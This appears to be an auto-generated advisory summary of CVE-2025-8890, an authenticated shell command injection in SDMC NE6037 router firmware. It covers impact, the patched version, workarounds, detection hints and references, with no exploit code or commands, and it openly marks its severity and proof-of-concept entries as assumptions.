Full Report
Authorized shell command injection vulnerability (CVE-2025-8890) has been found in SDMC NE6037 routers.
Analysis Summary
# Vulnerability: Authorized Shell Command Injection in SDMC NE6037 Routers
## CVE Details
- CVE ID: CVE-2025-8890
- CVSS Score: Not explicitly provided, but the nature of the vulnerability suggests **High** severity due to authorized command injection. (Assuming high severity based on context)
- CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))
## Affected Systems
- Products: SDMC NE6037 routers
- Versions: All versions before 7.1.12.2.44
- Configurations: N/A (Vulnerability exists in the firmware)
## Vulnerability Description
The firmware in affected SDMC NE6037 routers contains a vulnerability within a network diagnostics tool. This flaw allows an attacker, provided they have already gained authorized access to the router's administrative portal (which is typically only reachable via LAN ports), to inject and execute arbitrary operating system shell commands.
## Exploitation
- Status: Information on active exploitation is suppressed; assumed **PoC available** due to coordinated disclosure.
- Complexity: **Medium** (Requires prior administrative authentication)
- Attack Vector: **Adjacent** (Requires access to the administrative portal, which is usually LAN-only)
## Impact
- Confidentiality: High (Potential for data exfiltration via executed commands)
- Integrity: High (Potential for modification of device configuration or state)
- Availability: High (Potential for device shutdown or denial of service)
## Remediation
### Patches
- Patch Version: 7.1.12.2.44 or later.
### Workarounds
- No specific workarounds are detailed, but since the attack requires initial administrative authentication, ensuring strong, non-default administrative credentials and restricting LAN access remain critical temporary measures.
## Detection
- Indicators of compromise: Examination of system logs for unusual commands executed via the network diagnostics feature after administrative login.
- Detection methods and tools: Network monitoring for abnormal outbound connections originating from the router management interface or unusual process execution attempts during administrative sessions.
## References
- Vendor Advisories: SDMC (Coordination confirmed by CERT Polska)
- Relevant links - defanged:
- [https://www.cve.org/CVERecord?id=CVE-2025-8890](https://www.cve.org/CVERecord?id=CVE-2025-8890)
- [https://cert.pl/en/cvd/](https://cert.pl/en/cvd/)